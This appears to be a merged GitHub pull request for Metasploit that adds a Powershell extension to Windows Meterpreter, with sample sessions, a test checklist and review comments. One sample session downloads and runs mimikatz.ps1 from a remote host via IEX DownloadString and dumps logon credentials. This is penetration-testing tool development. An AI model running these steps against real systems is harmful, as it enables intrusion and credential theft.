### PR TITLE
Add Powershell extension

### PR DESCRIPTION
**Pull request by OJ**
This PR adds support for the new Powershell extension for Windows Meterpreter. This PR relies on work done in Meterpreter, the PR of which can be found here: https://github.com/rapid7/metasploit-payloads/pull/87

The goal was to create a proper interactive way of talking to Powershell without having to invoke the `Powershell.exe` file on the target. This implementation does the following:
- Allow single-shot execution of commands with output printed to the console via the `powershell_execute` command.
- Allow full interactivity with a channel-based psuedo-prompt via the `powershell_shell` command.
- Support the `-s` parameter on both new commands which allows for execution within the context of different sessions based on identifiers. Behind the scenes, the session called `Default` is used if no session id is specified.
## Sample run

```
meterpreter > use powershell 
Loading extension powershell...success.
meterpreter > use help
... snip ...
Powershell Commands
===================

    Command             Description
    -------             -----------
    powershell_execute  Execute a Powershell command string
    powershell_shell    Create an interactive Powershell prompt

meterpreter > powershell_execute -h
Usage: powershell_execute <powershell code> [-s session-id]

Runs the given Powershell string on the target.

OPTIONS:

    -h        Help banner
    -s <opt>  Specify the id/name of the Powershell session to run the command in.


meterpreter > powershell_shell -h
Usage: powershell_shell [-s session-id]

Creates an interactive Powershell prompt.

OPTIONS:

    -h        Help banner
    -s <opt>  Specify the id/name of the Powershell session to interact with.

meterpreter > powershell_shell 
PS > whoami
win-7ch5rt177ba\oj
PS > $x = $(whoami)
PS > $x
win-7ch5rt177ba\oj
PS > ^C
Terminate channel 1? [y/N]  y
meterpreter > powershell_shell 
PS > $x
win-7ch5rt177ba\oj
PS > ^C
Terminate channel 2? [y/N]  y
meterpreter > powershell_execute '$x'
[+] Command execution completed:
win-7ch5rt177ba\oj

meterpreter > powershell_execute '$x=1'
[+] Command execution completed:

meterpreter > powershell_execute '$x'
[+] Command execution completed:
1

meterpreter > powershell_execute '$x=333' -s another-session
[+] Command execution completed:

meterpreter > powershell_execute '$x'
[+] Command execution completed:
1

meterpreter > powershell_execute '$x' -s another-session
[+] Command execution completed:
333

meterpreter > powershell_shell -s another-session
PS > $x=$x*2
PS > $x
666
```

These examples are pretty simple, but aim to show you what you can do with arbitrary sessions. From here, the world of Powershell should be open and all the other goodies (such as `Invoke-Mimiktaz`) should work without any issue.

Some more interesting examples:

```
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > powershell_shell 
PS > IEX (New-Object System.Net.WebClient).DownloadString('https://<redacted>/mimikatz.ps1')
PS > Invoke-Mimikatz -DumpCreds
ERROR: Exception calling "SetCurrentDirectory" with "1" argument(s): "Could not find a part of the path 'scratch'."
ERROR: At line:2716 char:47
ERROR: +     [System.IO.Directory]::SetCurrentDirectory <<<< ($pwd)
ERROR:     + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
ERROR:     + FullyQualifiedErrorId : DotNetMethodException
ERROR:  

  .#####.   mimikatz 2.0 alpha (x64) release "Kiwi en C" (Feb 16 2015 22:15:28)
 .## ^ ##.  
 ## / \ ##  /* * *
 ## \ / ##   Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 '## v ##'   http://blog.gentilkiwi.com/mimikatz             (oe.eo)
  '#####'                                     with 15 modules * * */


mimikatz(powershell) # sekurlsa::logonpasswords

... snipping lots of stuff that's none of your damned business ...

    kerberos :  
     * Username : oj
     * Domain   : WIN-7CH5RT177BA
     * Password : <this is also none of your damned business>

... snipping lots MORE stuff that's none of your damned business ...

PS > Get-Process explorer

Handles  NPM(K)    PM(K)      WS(K) VM(M)   CPU(s)     Id ProcessName                                                  
-------  ------    -----      ----- -----   ------     -- -----------                                                  
    790      53    34340      63728   263    17.46   2376 explorer                                                     
```
## Verification
- [x] Start `msfconsole` and create new handlers for x64 and x86 sessions, make sure that you use a machine with .NET 2 only support (eg. Windows 2008 R2 without a service pack), and a machine with .NET 4 support (eg. Windows 10 or 8).
- [x] Launch new meterpreter sessions using the usual methods.
- [x] In each, execute `use powershell` to make sure that the extension loads without errors.
- [x] Use/play with the `powershell_shell` command (note that you have to use `CTRL+C` to exit the interactive session, as using `exit` or `quit` hasn't been implemented. Sessions persist, so you can re-interact with the same session behind the scenes after by reissueing the same command.
- [x] Use/play with the `powershell_execute` command as well.
- [x] Observe no crashes.
- [x] Observe that variables, functions, etc persist across calls in the same session.
- [x] Observe that variables, functions, etc do not interfere with, or clobber, the same variables and functions in other sessions.
## Notes

This code does not include a built-in Powershell implementation in the same way the Python extension has a built-in interpreter. Instead, this code relies on the existence of Powershell on the target machine.

### CODE REVIEW

**Comment by OJ** [comment]
I have plans to add more to this. The next big thing is having Meterpreter bindings enabled so that you can do things likes `Invoke-GetSystem` for example.

**Comment by OJ** [comment]
I'm having some interesting issues on Windows 8.1, looking into it. Testing still appreciated :)

**Comment by OJ** [comment]
At this point I think this has something to do with the fact that my Windows 8.x install only has v4.x of .NET in the `Framework64` folder, and I'm running an x64 binary.

**Comment by OJ** [comment]
I also need to add licensing information (ie. need to make sure that I give appropriate props to @leechristensen for his prior work on the unmanaged Powershell stuff, which I abused heavily in this work.

**Comment by sempervictus** [comment]
Whats the proper interface for post-module access to execute string? I'll wire up the Rex side of Powershell, and PR to you or in a separate request when this lands, just want to know how you'd like it tied in.

File: lib/rex/post/meterpreter/extensions/powershell/powershell.rb [hunk 1]
```diff
@@ -0,0 +1,59 @@
...
+        },
+      ])
+  end
+
+
+  def execute_string(opts={})
+    return nil unless opts[:code]
+
+    request = Packet.create_request('powershell_execute')
+    request.add_tlv(TLV_TYPE_POWERSHELL_CODE, opts[:code])
```
Comment (sempervictus) [inline lib/rex/post/meterpreter/extensions/powershell/powershell.rb]: Do we want to use native TLV zlib compression or the Gzip implementation in Rex::Powershell for efficient transport? I can implement this in the Post code by passhtrough method which will check compression/encoding and determine whether to compress the contents of opts[:code] prior to dispatching the result to execute_string.

Comment (OJ) [inline lib/rex/post/meterpreter/extensions/powershell/powershell.rb]: For v0.1, I'll leave it as is. Happy to discuss enhancing this down the track.

**Comment by Meatballs1** [comment]
:D

**Comment by bcook-r7** [comment]
I couldn't help but notice a window pop up and disappear when first running a command on windows 8.1

**Comment by bcook-r7** [comment]
Yeah, licensing info will certainly be needed here if it derives from Lee's code.

**Comment by OJ** [comment]
I've noticed that window popup and disappear as well. I'm looking into how I might make it stop, but it's not as easy as it would first appear!

**Comment by OJ** [comment]
As far as licensing goes, the initial version is "similar" to Lee's, and ideas are heavily based on it. The next version (with all the bindings and whatnot) diverges even more.

**Comment by OJ** [comment]
Lee's license for the unmanaged powershell work is here: https://github.com/leechristensen/UnmanagedPowerShell/blob/master/LICENSE

**Comment by bcook-r7** [comment]
Great, thanks.

**Pull request merged**